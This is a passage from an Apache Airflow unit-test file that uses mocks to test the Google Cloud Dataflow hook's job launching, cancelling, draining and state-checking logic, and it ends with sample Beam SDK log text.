location=TEST_LOCATION,
)
mock_controller.assert_called_once_with(
dataflow=mock_conn.return_value,
job_id=TEST_JOB_ID,
name=UNIQUE_JOB_NAME,
num_retries=5,
poll_sleep=10,
project_number=TEST_PROJECT,
location=TEST_LOCATION,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
)
mock_controller.return_value.wait_for_done.assert_called_once()
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_template_dataflow_with_runtime_env(self, mock_conn, mock_dataflowjob, mock_uuid):
options_with_runtime_env = copy.deepcopy(RUNTIME_ENV)
dataflowjob_instance = mock_dataflowjob.return_value
dataflowjob_instance.wait_for_done.return_value = None
# fmt: off
method = (mock_conn.return_value
.projects.return_value
.locations.return_value
.templates.return_value
.launch)
# fmt: on
method.return_value.execute.return_value = {'job': {'id': TEST_JOB_ID}}
self.dataflow_hook.start_template_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=options_with_runtime_env,
parameters=PARAMETERS,
dataflow_template=TEST_TEMPLATE,
project_id=TEST_PROJECT,
environment={"numWorkers": 17},
)
body = {"jobName": mock.ANY, "parameters": PARAMETERS, "environment": RUNTIME_ENV}
method.assert_called_once_with(
projectId=TEST_PROJECT,
location=DEFAULT_DATAFLOW_LOCATION,
gcsPath=TEST_TEMPLATE,
body=body,
)
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
job_id=TEST_JOB_ID,
location=DEFAULT_DATAFLOW_LOCATION,
name=f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}',
num_retries=5,
poll_sleep=10,
project_number=TEST_PROJECT,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
)
mock_uuid.assert_called_once_with()
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_template_dataflow_update_runtime_env(self, mock_conn, mock_dataflowjob, mock_uuid):
options_with_runtime_env = copy.deepcopy(RUNTIME_ENV)
del options_with_runtime_env["numWorkers"]
runtime_env = {"numWorkers": 17}
expected_runtime_env = copy.deepcopy(RUNTIME_ENV)
expected_runtime_env.update(runtime_env)
dataflowjob_instance = mock_dataflowjob.return_value
dataflowjob_instance.wait_for_done.return_value = None
# fmt: off
method = (mock_conn.return_value
.projects.return_value
.locations.return_value
.templates.return_value
.launch)
# fmt: on
method.return_value.execute.return_value = {'job': {'id': TEST_JOB_ID}}
self.dataflow_hook.start_template_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=options_with_runtime_env,
parameters=PARAMETERS,
dataflow_template=TEST_TEMPLATE,
project_id=TEST_PROJECT,
environment=runtime_env,
)
body = {"jobName": mock.ANY, "parameters": PARAMETERS, "environment": expected_runtime_env}
method.assert_called_once_with(
projectId=TEST_PROJECT,
location=DEFAULT_DATAFLOW_LOCATION,
gcsPath=TEST_TEMPLATE,
body=body,
)
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
job_id=TEST_JOB_ID,
location=DEFAULT_DATAFLOW_LOCATION,
name=f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}',
num_retries=5,
poll_sleep=10,
project_number=TEST_PROJECT,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
)
mock_uuid.assert_called_once_with()
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_flex_template(self, mock_conn, mock_controller):
mock_locations = mock_conn.return_value.projects.return_value.locations
launch_method = mock_locations.return_value.flexTemplates.return_value.launch
launch_method.return_value.execute.return_value = {"job": {"id": TEST_JOB_ID}}
mock_controller.return_value.get_jobs.return_value = [{"id": TEST_JOB_ID}]
on_new_job_id_callback = mock.MagicMock()
result = self.dataflow_hook.start_flex_template(
body={"launchParameter": TEST_FLEX_PARAMETERS},
location=TEST_LOCATION,
project_id=TEST_PROJECT_ID,
on_new_job_id_callback=on_new_job_id_callback,
)
on_new_job_id_callback.assert_called_once_with(TEST_JOB_ID)
launch_method.assert_called_once_with(
projectId='test-project-id',
body={'launchParameter': TEST_FLEX_PARAMETERS},
location=TEST_LOCATION,
)
mock_controller.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
job_id=TEST_JOB_ID,
location=TEST_LOCATION,
poll_sleep=self.dataflow_hook.poll_sleep,
num_retries=self.dataflow_hook.num_retries,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
)
mock_controller.return_value.get_jobs.wait_for_done.assrt_called_once_with()
mock_controller.return_value.get_jobs.assrt_called_once_with()
assert result == {"id": TEST_JOB_ID}
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_cancel_job(self, mock_get_conn, jobs_controller):
self.dataflow_hook.cancel_job(
job_name=UNIQUE_JOB_NAME, job_id=TEST_JOB_ID, project_id=TEST_PROJECT, location=TEST_LOCATION
)
jobs_controller.assert_called_once_with(
dataflow=mock_get_conn.return_value,
job_id=TEST_JOB_ID,
location=TEST_LOCATION,
name=UNIQUE_JOB_NAME,
poll_sleep=10,
project_number=TEST_PROJECT,
num_retries=5,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
)
jobs_controller.cancel()
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.provide_authorized_gcloud'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
@mock.patch(DATAFLOW_STRING.format('subprocess.run'))
def test_start_sql_job_failed_to_run(
self, mock_run, mock_get_conn, mock_provide_authorized_gcloud, mock_controller
):
test_job = {'id': "TEST_JOB_ID"}
mock_controller.return_value.get_jobs.return_value = [test_job]
mock_run.return_value = mock.MagicMock(
stdout=f"{TEST_JOB_ID}\n".encode(), stderr=f"{TEST_JOB_ID}\n".encode(), returncode=0
)
on_new_job_id_callback = mock.MagicMock()
result = self.dataflow_hook.start_sql_job(
job_name=TEST_SQL_JOB_NAME,
query=TEST_SQL_QUERY,
options=TEST_SQL_OPTIONS,
location=TEST_LOCATION,
project_id=TEST_PROJECT,
on_new_job_id_callback=on_new_job_id_callback,
)
mock_run.assert_called_once_with(
[
'gcloud',
'dataflow',
'sql',
'query',
TEST_SQL_QUERY,
'--project=test-project',
'--format=value(job.id)',
'--job-name=test-sql-job-name',
'--region=custom-location',
'--bigquery-project=test-project',
'--bigquery-dataset=test-dataset',
'--bigquery-table=beam_output',
'--bigquery-write-disposition=write-truncate',
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
mock_controller.assert_called_once_with(
dataflow=mock_get_conn.return_value,
job_id=TEST_JOB_ID,
location=TEST_LOCATION,
poll_sleep=10,
project_number=TEST_PROJECT,
num_retries=5,
drain_pipeline=False,
)
mock_controller.return_value.wait_for_done.assert_called_once()
assert result == test_job
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.provide_authorized_gcloud'))
@mock.patch(DATAFLOW_STRING.format('subprocess.run'))
def test_start_sql_job(self, mock_run, mock_provide_authorized_gcloud, mock_get_conn):
mock_run.return_value = mock.MagicMock(
stdout=f"{TEST_JOB_ID}\n".encode(), stderr=f"{TEST_JOB_ID}\n".encode(), returncode=1
)
with pytest.raises(AirflowException):
self.dataflow_hook.start_sql_job(
job_name=TEST_SQL_JOB_NAME,
query=TEST_SQL_QUERY,
options=TEST_SQL_OPTIONS,
location=TEST_LOCATION,
project_id=TEST_PROJECT,
on_new_job_id_callback=mock.MagicMock(),
)
class TestDataflowJob(unittest.TestCase):
def setUp(self):
self.mock_dataflow = MagicMock()
def test_dataflow_job_init_with_job_id(self):
mock_jobs = MagicMock()
self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value = mock_jobs
_DataflowJobsController(
self.mock_dataflow, TEST_PROJECT, TEST_LOCATION, 10, UNIQUE_JOB_NAME, TEST_JOB_ID
).get_jobs()
mock_jobs.get.assert_called_once_with(
projectId=TEST_PROJECT, location=TEST_LOCATION, jobId=TEST_JOB_ID
)
def test_dataflow_job_init_without_job_id(self):
job = {"id": TEST_JOB_ID, "name": UNIQUE_JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_DONE}
mock_list = self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value.list
(mock_list.return_value.execute.return_value) = {'jobs': [job]}
# fmt: off
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
_DataflowJobsController(
self.mock_dataflow, TEST_PROJECT, TEST_LOCATION, 10, UNIQUE_JOB_NAME
).get_jobs()
mock_list.assert_called_once_with(projectId=TEST_PROJECT, location=TEST_LOCATION)
def test_dataflow_job_wait_for_multiple_jobs(self):
job = {
"id": TEST_JOB_ID,
"name": UNIQUE_JOB_NAME,
"type": DataflowJobType.JOB_TYPE_BATCH,
"currentState": DataflowJobStatus.JOB_STATE_DONE,
}
# fmt: off
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list.return_value.
execute.return_value
) = {
"jobs": [job, job]
}
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=10,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=True,
)
dataflow_job.wait_for_done()
# fmt: off
self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value.\
list.assert_called_once_with(location=TEST_LOCATION, projectId=TEST_PROJECT)
self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value.list\
.return_value.execute.assert_called_once_with(num_retries=20)
# fmt: on
assert dataflow_job.get_jobs() == [job, job]
@parameterized.expand(
[
(DataflowJobStatus.JOB_STATE_FAILED, "Google Cloud Dataflow job name-2 has failed\\."),
(DataflowJobStatus.JOB_STATE_CANCELLED, "Google Cloud Dataflow job name-2 was cancelled\\."),
(DataflowJobStatus.JOB_STATE_DRAINED, "Google Cloud Dataflow job name-2 was drained\\."),
(DataflowJobStatus.JOB_STATE_UPDATED, "Google Cloud Dataflow job name-2 was updated\\."),
(
DataflowJobStatus.JOB_STATE_UNKNOWN,
"Google Cloud Dataflow job name-2 was unknown state: JOB_STATE_UNKNOWN",
),
]
)
def test_dataflow_job_wait_for_multiple_jobs_and_one_in_terminal_state(self, state, exception_regex):
# fmt: off
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list.return_value.
execute.return_value
) = {
"jobs": [
{
"id": "id-1", "name": "name-1",
"type": DataflowJobType.JOB_TYPE_BATCH,
"currentState": DataflowJobStatus.JOB_STATE_DONE
},
{
"id": "id-2", "name": "name-2",
"type": DataflowJobType.JOB_TYPE_BATCH,
"currentState": state
}
]
}
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
)
with pytest.raises(Exception, match=exception_regex):
dataflow_job.wait_for_done()
def test_dataflow_job_wait_for_multiple_jobs_and_streaming_jobs(self):
# fmt: off
mock_jobs_list = (
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list
)
mock_jobs_list.return_value.execute.return_value = {
"jobs": [
{
"id": "id-2",
"name": "name-2",
"currentState": DataflowJobStatus.JOB_STATE_RUNNING,
"type": DataflowJobType.JOB_TYPE_STREAMING
}
]
}
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
)
dataflow_job.wait_for_done()
assert 1 == mock_jobs_list.call_count
def test_dataflow_job_wait_for_single_jobs(self):
job = {
"id": TEST_JOB_ID,
"name": UNIQUE_JOB_NAME,
"type": DataflowJobType.JOB_TYPE_BATCH,
"currentState": DataflowJobStatus.JOB_STATE_DONE,
}
# fmt: off
self.mock_dataflow.projects.return_value.locations.return_value. \
jobs.return_value.get.return_value.execute.return_value = job
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=10,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=False,
)
dataflow_job.wait_for_done()
# fmt: off
self.mock_dataflow.projects.return_value.locations.return_value. \
jobs.return_value.get.assert_called_once_with(
jobId=TEST_JOB_ID,
location=TEST_LOCATION,
projectId=TEST_PROJECT
)
self.mock_dataflow.projects.return_value.locations.return_value. \
jobs.return_value.get.return_value.execute.assert_called_once_with(num_retries=20)
# fmt: on
assert dataflow_job.get_jobs() == [job]
def test_dataflow_job_is_job_running_with_no_job(self):
# fmt: off
mock_jobs_list = (
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list
)
mock_jobs_list.return_value.execute.return_value = {
"jobs": []
}
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
)
result = dataflow_job.is_job_running()
assert result is False
# fmt: off
@parameterized.expand([
# RUNNING
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_RUNNING, None, False),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_RUNNING, None, True),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_RUNNING, True, False),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_RUNNING, True, False),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_RUNNING, False, True),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_RUNNING, False, True),
# AWAITING STATE
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_PENDING, None, False),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_PENDING, None, False),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_PENDING, True, False),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_PENDING, True, False),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_PENDING, False, True),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_PENDING, False, True),
])
# fmt: on
def test_check_dataflow_job_state_wait_until_finished(
self, job_type, job_state, wait_until_finished, expected_result
):
job = {"id": "id-2", "name": "name-2", "type": job_type, "currentState": job_state}
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
wait_until_finished=wait_until_finished,
)
result = dataflow_job._check_dataflow_job_state(job)
assert result == expected_result
# fmt: off
@parameterized.expand([
# RUNNING
(DataflowJobStatus.JOB_STATE_RUNNING, None, False),
(DataflowJobStatus.JOB_STATE_RUNNING, True, False),
(DataflowJobStatus.JOB_STATE_RUNNING, False, True),
# AWAITING STATE
(DataflowJobStatus.JOB_STATE_PENDING, None, False),
(DataflowJobStatus.JOB_STATE_PENDING, True, False),
(DataflowJobStatus.JOB_STATE_PENDING, False, True),
])
# fmt: on
def test_check_dataflow_job_state_without_job_type(self, job_state, wait_until_finished, expected_result):
job = {"id": "id-2", "name": "name-2", "currentState": job_state}
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
wait_until_finished=wait_until_finished,
)
result = dataflow_job._check_dataflow_job_state(job)
assert result == expected_result
# fmt: off
@parameterized.expand([
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_FAILED,
"Google Cloud Dataflow job name-2 has failed\\."),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_FAILED,
"Google Cloud Dataflow job name-2 has failed\\."),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_UNKNOWN,
"Google Cloud Dataflow job name-2 was unknown state: JOB_STATE_UNKNOWN"),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_UNKNOWN,
"Google Cloud Dataflow job name-2 was unknown state: JOB_STATE_UNKNOWN"),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_CANCELLED,
"Google Cloud Dataflow job name-2 was cancelled\\."),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_CANCELLED,
"Google Cloud Dataflow job name-2 was cancelled\\."),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_DRAINED,
"Google Cloud Dataflow job name-2 was drained\\."),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_DRAINED,
"Google Cloud Dataflow job name-2 was drained\\."),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_UPDATED,
"Google Cloud Dataflow job name-2 was updated\\."),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_UPDATED,
"Google Cloud Dataflow job name-2 was updated\\."),
])
# fmt: on
def test_check_dataflow_job_state_terminal_state(self, job_type, job_state, exception_regex):
job = {"id": "id-2", "name": "name-2", "type": job_type, "currentState": job_state}
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
)
with pytest.raises(Exception, match=exception_regex):
dataflow_job._check_dataflow_job_state(job)
def test_dataflow_job_cancel_job(self):
mock_jobs = self.mock_dataflow.projects.return_value.locations.return_value.jobs
get_method = mock_jobs.return_value.get
get_method.return_value.execute.side_effect = [
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_RUNNING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_PENDING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_QUEUED},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_DRAINING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_STOPPED},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLED},
]
mock_jobs.return_value.list_next.return_value = None
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=0,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=False,
)
dataflow_job.cancel()
get_method.assert_called_with(jobId=TEST_JOB_ID, location=TEST_LOCATION, projectId=TEST_PROJECT)
get_method.return_value.execute.assert_called_with(num_retries=20)
self.mock_dataflow.new_batch_http_request.assert_called_once_with()
mock_batch = self.mock_dataflow.new_batch_http_request.return_value
mock_update = mock_jobs.return_value.update
mock_update.assert_called_once_with(
body={'requestedState': 'JOB_STATE_CANCELLED'},
jobId='test-job-id',
location=TEST_LOCATION,
projectId='test-project',
)
mock_batch.add.assert_called_once_with(mock_update.return_value)
@mock.patch("airflow.providers.google.cloud.hooks.dataflow.timeout")
@mock.patch("time.sleep")
def test_dataflow_job_cancel_job_cancel_timeout(self, mock_sleep, mock_timeout):
mock_jobs = self.mock_dataflow.projects.return_value.locations.return_value.jobs
get_method = mock_jobs.return_value.get
get_method.return_value.execute.side_effect = [
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLED},
]
mock_jobs.return_value.list_next.return_value = None
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=4,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=False,
cancel_timeout=10,
)
dataflow_job.cancel()
get_method.assert_called_with(jobId=TEST_JOB_ID, location=TEST_LOCATION, projectId=TEST_PROJECT)
get_method.return_value.execute.assert_called_with(num_retries=20)
self.mock_dataflow.new_batch_http_request.assert_called_once_with()
mock_batch = self.mock_dataflow.new_batch_http_request.return_value
mock_update = mock_jobs.return_value.update
mock_update.assert_called_once_with(
body={'requestedState': 'JOB_STATE_CANCELLED'},
jobId='test-job-id',
location=TEST_LOCATION,
projectId='test-project',
)
mock_batch.add.assert_called_once_with(mock_update.return_value)
mock_sleep.assert_has_calls([mock.call(4), mock.call(4), mock.call(4)])
mock_timeout.assert_called_once_with(
seconds=10, error_message='Canceling jobs failed due to timeout (10s): test-job-id'
)
@parameterized.expand(
[
(False, "JOB_TYPE_BATCH", "JOB_STATE_CANCELLED"),
(False, "JOB_TYPE_STREAMING", "JOB_STATE_CANCELLED"),
(True, "JOB_TYPE_BATCH", "JOB_STATE_CANCELLED"),
(True, "JOB_TYPE_STREAMING", "JOB_STATE_DRAINED"),
]
)
def test_dataflow_job_cancel_or_drain_job(self, drain_pipeline, job_type, requested_state):
job = {
"id": TEST_JOB_ID,
"name": UNIQUE_JOB_NAME,
"currentState": DataflowJobStatus.JOB_STATE_RUNNING,
"type": job_type,
}
get_method = self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value.get
get_method.return_value.execute.return_value = job
# fmt: off
job_list_nest_method = (self.mock_dataflow
.projects.return_value.
locations.return_value.
jobs.return_value.list_next)
job_list_nest_method.return_value = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=10,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=False,
drain_pipeline=drain_pipeline,
cancel_timeout=None,
)
dataflow_job.cancel()
get_method.assert_called_once_with(jobId=TEST_JOB_ID, location=TEST_LOCATION, projectId=TEST_PROJECT)
get_method.return_value.execute.assert_called_once_with(num_retries=20)
self.mock_dataflow.new_batch_http_request.assert_called_once_with()
mock_batch = self.mock_dataflow.new_batch_http_request.return_value
mock_update = self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value.update
mock_update.assert_called_once_with(
body={'requestedState': requested_state},
jobId='test-job-id',
location=TEST_LOCATION,
projectId='test-project',
)
mock_batch.add.assert_called_once_with(mock_update.return_value)
mock_batch.execute.assert_called_once()
def test_dataflow_job_cancel_job_no_running_jobs(self):
mock_jobs = self.mock_dataflow.projects.return_value.locations.return_value.jobs
get_method = mock_jobs.return_value.get
get_method.return_value.execute.side_effect = [
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_DONE},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_UPDATED},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_DRAINED},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_FAILED},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLED},
]
mock_jobs.return_value.list_next.return_value = None
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=0,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=False,
)
dataflow_job.cancel()
get_method.assert_called_with(jobId=TEST_JOB_ID, location=TEST_LOCATION, projectId=TEST_PROJECT)
get_method.return_value.execute.assert_called_with(num_retries=20)
self.mock_dataflow.new_batch_http_request.assert_not_called()
mock_jobs.return_value.update.assert_not_called()
def test_fetch_list_job_messages_responses(self):
# fmt: off
mock_list = (
self.mock_dataflow
.projects.return_value
.locations.return_value
.jobs.return_value
.messages.return_value
.list
)
mock_list_next = (
self.mock_dataflow.
projects.return_value.
locations.return_value.
jobs.return_value
.messages.return_value
.list_next
)
# fmt: on
mock_list.return_value.execute.return_value = "response_1"
mock_list_next.return_value = None
jobs_controller = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
location=TEST_LOCATION,
job_id=TEST_JOB_ID,
)
result = list(jobs_controller._fetch_list_job_messages_responses(TEST_JOB_ID))
mock_list.assert_called_once_with(projectId=TEST_PROJECT, location=TEST_LOCATION, jobId=TEST_JOB_ID)
mock_list_next.assert_called_once_with(
previous_request=mock_list.return_value, previous_response="response_1"
)
assert result == ["response_1"]
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController._fetch_list_job_messages_responses'))
def test_fetch_job_messages_by_id(self, mock_fetch_responses):
mock_fetch_responses.return_value = iter(
[
{"jobMessages": ["message_1"]},
{"jobMessages": ["message_2"]},
]
)
jobs_controller = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
location=TEST_LOCATION,
job_id=TEST_JOB_ID,
)
result = jobs_controller.fetch_job_messages_by_id(TEST_JOB_ID)
mock_fetch_responses.assert_called_once_with(job_id=TEST_JOB_ID)
assert result == ['message_1', 'message_2']
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController._fetch_list_job_messages_responses'))
def test_fetch_job_autoscaling_events_by_id(self, mock_fetch_responses):
mock_fetch_responses.return_value = iter(
[
{"autoscalingEvents": ["event_1"]},
{"autoscalingEvents": ["event_2"]},
]
)
jobs_controller = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
location=TEST_LOCATION,
job_id=TEST_JOB_ID,
)
result = jobs_controller.fetch_job_autoscaling_events_by_id(TEST_JOB_ID)
mock_fetch_responses.assert_called_once_with(job_id=TEST_JOB_ID)
assert result == ['event_1', 'event_2']
APACHE_BEAM_V_2_14_0_JAVA_SDK_LOG = f""""\
Dataflow SDK version: 2.14.0
Jun 15, 2020 2:57:28 PM org.apache.beam.runners.dataflow.DataflowRunner run
INFO: To access the Dataflow monitoring console, please navigate to https://console.cloud.google.com/dataflow\
/jobsDetail/locations/europe-west3/jobs/{TEST_JOB_ID}?project=XXX
Submitted job: {TEST_JOB_ID}
Jun 15, 2020 2:57:28 PM org.apache.beam.runners.dataflow.DataflowRunner run
INFO: To cancel the job using the 'gcloud' tool, run:
> gcloud dataflow jobs --project=XXX cancel --region=europe-west3 {TEST_JOB_ID}
"""
APACHE_BEAM_V_2_22_0_JAVA_SDK_LOG = f""""\
INFO: Dataflow SDK version: 2.22.0
Jun 15, 2020 3:09:03 PM org.apache.beam.runners.dataflow.DataflowRunner run
INFO: To access the Dataflow monitoring console, please navigate to https://console.cloud.google.com/dataflow\
/jobs/europe-west3/{TEST_JOB_ID}?project=XXXX
Jun 15, 2020 3:09:03 PM org.apache.beam.runners.dataflow.DataflowRunner run
INFO: Submitted job: {TEST_JOB_ID}
Jun 15, 2020 3:09:03 PM org.apache.beam.runners.dataflow.DataflowRunner run
INFO: To cancel the job using the 'gcloud' tool, run:
> gcloud dataflow jobs --project=XXX cancel --region=europe-west3 {TEST_JOB_ID}
"""
APACHE_BEAM_V_2_14_0_PYTHON_SDK_LOG = f""""\
INFO:root:Completed GCS upload to gs://test-dataflow-example/staging/start-python-job-local-5bcf3d71.\
1592286375.000962/apache_beam-2.14.0-cp37-cp37m-manylinux1_x86_64.whl in 0 seconds.
INFO:root:Create job: <Job
createTime: '2020-06-16T05:46:20.911857Z'
currentStateTime: '1970-01-01T00:00:00Z'
id: '{TEST_JOB_ID}'
location: 'us-central1'
name: 'start-python-job-local-5bcf3d71'
projectId: 'XXX'
stageStates: []
startTime: '2020-06-16T05:46:20.911857Z'
steps: []
tempFiles: []
type: TypeValueValuesEnum(JOB_TYPE_BATCH, 1)>
INFO:root:Created job with id: [{TEST_JOB_ID}]
